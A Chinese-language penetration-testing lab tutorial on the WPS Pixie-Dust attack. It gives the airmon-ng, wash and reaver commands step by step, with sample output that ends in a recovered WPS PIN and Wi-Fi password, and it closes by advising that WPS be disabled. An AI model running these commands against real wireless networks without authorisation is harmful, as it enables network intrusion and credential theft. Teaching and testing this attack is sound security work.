Wi-Fi Protected Setup (WPS) 是一项旨在简化设备连接到安全无线网络的功能。然而,某些 WPS 的实现存在一个关键漏洞,可以被利用。Pixie-Dust 攻击针对的是一些无线接入点 (access points) 在 WPS 握手过程中生成随机数 (nonces) 的方式中的一个缺陷。与需要数小时的标准暴力破解攻击不同,成功的 Pixie-Dust 攻击可以在几秒钟内恢复 WPS PIN 和 WPA/WPA2 密码。
在本实验 (lab) 中,你将扮演一名渗透测试人员,学习此攻击的工作原理。你将使用 aircrack-ng 套件和 Reaver 中的工具,在模拟环境中识别易受攻击的目标并执行 Pixie-Dust 攻击。这将让你对这种强大的 Wi-Fi 黑客技术有实际的理解。
在此步骤中,你将首先扫描附近启用了 WPS 的 Wi-Fi 网络。为此,你首先需要将无线接口置于“监控模式”(monitor mode),这允许它捕获空中所有的 Wi-Fi 流量,而不仅仅是发往你设备的流量。airmon-ng 工具用于此目的。
让我们开始在 wlan0 接口上启用监控模式。在实际场景中,这会创建一个新的虚拟接口,通常命名为 wlan0mon。
sudo airmon-ng start wlan0你应该会看到输出确认监控模式已在名为 wlan0mon 的新接口上启用。
PHY Interface Driver Chipset
phy0 wlan0 ath9k Atheros Communications Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)现在你已经有了一个处于监控模式的接口,你可以使用 wash 工具扫描启用了 WPS 的接入点 (APs)。wash 将列出它检测到的所有 WPS 网络,以及关于它们的重要信息。
运行以下命令在你的监控接口上开始扫描:
sudo wash -i wlan0mon片刻之后,wash 将显示一个网络列表。
Wash v1.6.5 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Ch WPS Version WPS Locked ESSID
----------------------------------------------------------------
00:11:22:33:44:55 6 1.0 No VulnerableAP
AA:BB:CC:DD:EE:FF 1 1.0 Yes SecuredAP从这个输出中,寻找一个目标。Pixie-Dust 攻击的理想目标是 WPS Locked 为 No 的网络。在我们的例子中,ESSID 为 VulnerableAP、BSSID 为 00:11:22:33:44:55 的网络就是我们的目标。记下它的 BSSID,因为你将在下一步中使用它。
在此步骤中,我们将准备使用 Reaver 发起攻击。Reaver 是一个专门设计用于针对 WPS 注册器 PIN 进行暴力破解攻击以恢复 WPA/WPA2 密码短语的工具。
然而,Reaver 也为速度快得多的 Pixie-Dust 攻击提供了一个特殊模式。要启用此模式,你必须使用 -K 或 --pixie-dust 命令行参数。当使用此参数时,Reaver 将首先尝试 Pixie-Dust 攻击。如果目标 AP 不易受攻击,Reaver 可以回退到传统的、较慢的暴力破解方法。
用于 Pixie-Dust 攻击的 Reaver 命令的基本结构如下所示:
sudo reaver -i <monitor_interface> -b <target_bssid> -K
sudo reaver: 以 root 权限执行 Reaver 工具。-i <monitor_interface>: 指定处于监控模式的网络接口(例如 wlan0mon)。-b <target_bssid>: 指定目标接入点的 BSSID(MAC 地址)。-K: 这是告诉 Reaver 执行 Pixie-Dust 攻击的关键开关。此步骤是关于理解命令的结构。在下一步中,你将把这些知识与从 wash 扫描中收集到的信息结合起来执行完整的命令。
现在是时候将所有内容整合起来并启动攻击了。你已经确定了目标 BSSID,并且知道 Reaver 进行 Pixie-Dust 攻击的命令结构。
回顾步骤 1:
wlan0mon00:11:22:33:44:55你现在将构建完整的 Reaver 命令。我们还将添加 -vv(非常详细)选项。强烈推荐使用此选项,因为它会显示 WPS 交换的详细信息,包括对于 Pixie-Dust 攻击至关重要的 nonces 和 hashes。这些输出对于理解攻击如何工作至关重要。
在你的终端中执行以下命令来启动攻击:
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vvReaver 现在将开始与目标接入点通信。你将看到一系列消息,指示 WPS 握手的进度。由于在我们的模拟环境中目标易受攻击,攻击将非常迅速。
在此步骤中,你将分析 Reaver 命令的输出,以理解 Pixie-Dust 攻击的机制。这是一个概念性步骤,无需运行新命令。
查看 Reaver 在上一步生成的详细输出。你应该会看到以 [P] 开头的行,这些行显示了在 WPS 交换期间捕获的值:
...
[+] Sending M1 message
[+] Received M2 message
[P] E-S1: d3b25a26a713c1b2
[P] E-S2: 1a84a5e22236aebd
[P] PKE: c1...e2
[P] PKR: 3a...b1
[P] E-Hash1: 7d...c3
[P] E-Hash2: 9f...a5
[P] AuthKey: 8c...99
...以下是发生的情况:
E-S1 和 E-S2),这些 nonces 本应是仅使用一次的大型随机数。E-S1 和 E-S2)以及两个 hashes(E-Hash1 和 E-Hash2)。有了这四个值,它就有了足够的信息在本地机器上执行 离线 计算。它在你的本地机器上暴力破解 PIN,而无需向 AP 发送任何更多请求。由于破解过程是离线进行的,并且利用了 nonce 生成中的数学弱点,因此它绕过了 AP 的速率限制防御,几乎立即找到了正确的 PIN。
在最后一步中,你将观察到攻击的成功结果。在 Reaver 执行离线计算后,它将显示恢复的凭据。
来自步骤 3 的 Reaver 输出的最后一部分应如下所示:
...
[+] Pixie-Dust attack...
[+] 100.00% complete @ 2023-10-27 10:30:00 (0 seconds remaining)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'SuperSecretPassword'
[+] AP SSID: 'VulnerableAP'让我们分解一下恢复的信息:
WPS PIN: '12345670': 这是路由器 WPS 功能的 8 位 PIN 码。你可以使用此 PIN 码将其他支持 WPS 的设备连接到网络。WPA PSK: 'SuperSecretPassword': 这是 WPA/WPA2 预共享密钥,也就是网络的实际 Wi-Fi 密码。这是攻击的最终目标。AP SSID: 'VulnerableAP': 这确认了你已成功攻破的网络名称。最值得注意的是速度。请注意输出中的“0 seconds remaining”。整个过程,从发起握手到恢复密钥,仅用了几秒钟。这与传统的 WPS 暴力破解攻击形成了鲜明对比,后者可能需要数小时,甚至在 AP 在几次失败尝试后锁定 WPS 的情况下是不可能的。你现在已经成功展示了 WPS Pixie-Dust 攻击的有效性。
在此实验中,你成功地在模拟环境中执行了 WPS Pixie-Dust 攻击。你获得了 Wi-Fi 安全评估工具和概念的实践经验。
你学会了:
airmon-ng 为无线接口启用监控模式(monitor mode)。wash 扫描并识别启用了 WPS 的接入点(access points)。-K (--pixie-dust) 标志的作用。reaver 执行有针对性的 Pixie-Dust 攻击,指定目标的 BSSID。此实验突显了一个重大的现实世界漏洞。对此类以及其他与 WPS 相关的攻击最有效的防御措施是,在路由器的管理设置中完全禁用 WPS 功能。